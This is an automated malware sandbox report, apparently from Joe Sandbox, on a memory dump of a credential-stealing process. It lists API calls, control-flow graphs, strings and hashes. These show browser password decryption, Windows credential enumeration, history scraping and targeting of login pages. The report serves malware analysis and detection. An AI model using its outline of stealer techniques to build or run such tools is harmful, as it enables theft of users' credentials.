                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                • String ID: $/deleteregkey$/savelangfile
                                • API String ID: 2744995895-28296030
                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                Control-flow Graph

                                APIs
                                • memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                • wcsrchr.MSVCRT ref: 0040B738
                                • memset.MSVCRT ref: 0040B756
                                • memset.MSVCRT ref: 0040B7F5
                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                • memset.MSVCRT ref: 0040B851
                                • memset.MSVCRT ref: 0040B8CA
                                • memcmp.MSVCRT ref: 0040B9BF
                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                • memset.MSVCRT ref: 0040BB53
                                • memcpy.MSVCRT ref: 0040BB66
                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                • String ID: chp$v10
                                • API String ID: 580435826-2783969131
                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                • String ID:
                                • API String ID: 3715365532-3916222277
                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                • String ID: bhv
                                • API String ID: 327780389-2689659898
                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                • API String ID: 2941347001-70141382
                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 652 4467ac-4467b7 __setusermatherr 644->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->653 646->642 650 44674d-44674f 646->650 647->642 649 446734-44673b 647->649 649->642 654 44673d-446745 649->654 651 446755-446758 650->651 651->644 652->653 657 446810-446819 653->657 658 44681e-446825 653->658 654->651 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 669 446853-446864 GetStartupInfoW 662->669 670 44684d-446851 662->670 663->661 664->660 664->665 665->662 667 446840-446842 665->667 667->662 671 446866-44686a 669->671 672 446879-44687b 669->672 670->667 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                • String ID:
                                • API String ID: 2827331108-0
                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                Control-flow Graph

                                APIs
                                • memset.MSVCRT ref: 0040C298
                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                • wcschr.MSVCRT ref: 0040C324
                                • wcschr.MSVCRT ref: 0040C344
                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                • GetLastError.KERNEL32 ref: 0040C373
                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                • String ID: visited:
                                • API String ID: 1157525455-1702587658
                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                APIs
                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                • memset.MSVCRT ref: 0040E1BD
                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                • _snwprintf.MSVCRT ref: 0040E257
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                • API String ID: 3883404497-2982631422
                                • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                • memset.MSVCRT ref: 0040BC75
                                • memset.MSVCRT ref: 0040BC8C
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                • memcmp.MSVCRT ref: 0040BCD6
                                • memcpy.MSVCRT ref: 0040BD2B
                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                • String ID:
                                • API String ID: 509814883-3916222277
                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                APIs
                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                • GetLastError.KERNEL32 ref: 0041847E
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: CreateFile$??3@ErrorLast
                                • String ID: |A
                                • API String ID: 1407640353-1717621600
                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                • String ID: r!A
                                • API String ID: 2791114272-628097481
                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                • _wcslwr.MSVCRT ref: 0040C817
                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                • wcslen.MSVCRT ref: 0040C82C
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                • API String ID: 62308376-4196376884
                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                APIs
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                • wcslen.MSVCRT ref: 0040BE06
                                • _wcsncoll.MSVCRT ref: 0040BE38
                                • memset.MSVCRT ref: 0040BE91
                                • memcpy.MSVCRT ref: 0040BEB2
                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                • wcschr.MSVCRT ref: 0040BF24
                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                • String ID:
                                • API String ID: 3191383707-0
                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                APIs
                                • memset.MSVCRT ref: 00403CBF
                                • memset.MSVCRT ref: 00403CD4
                                • memset.MSVCRT ref: 00403CE9
                                • memset.MSVCRT ref: 00403CFE
                                • memset.MSVCRT ref: 00403D13
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 00403DDA
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                • String ID: Waterfox$Waterfox\Profiles
                                • API String ID: 3527940856-11920434
                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                APIs
                                • memset.MSVCRT ref: 00403E50
                                • memset.MSVCRT ref: 00403E65
                                • memset.MSVCRT ref: 00403E7A
                                • memset.MSVCRT ref: 00403E8F
                                • memset.MSVCRT ref: 00403EA4
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
